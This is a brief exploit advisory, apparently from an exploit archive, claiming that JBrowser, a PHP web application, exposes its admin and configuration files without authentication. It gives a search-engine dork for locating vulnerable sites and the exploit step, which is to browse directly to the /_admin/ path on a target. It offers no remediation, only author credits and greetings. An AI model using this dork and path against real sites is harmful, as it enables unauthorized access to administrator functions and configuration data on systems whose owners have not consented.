It appears that JBrowser may allow arbitrary access to admin/config files.
163a53866c4d1a2a6661658c02b315252b9f2ed5699f413d10c1fb1b0fb29dbb
* JBrowser acces to admin/config files
* By : sn0oPy
* Risk : high
* Dork : inurl:"JBrowser/index.php"
* exploit :
juste replace the http://www.target.ma/jbrowser/index.php
by http://www.target.ma/jbrowser/_admin/
* contact : sn0oPy@avenir-geopolitique.net
* greetz : [subzero], Avg Team(forums.avenir-geopolitique.net).
* Reference : http://forums.avenir-geopolitique.net/viewtopic.php?t=2693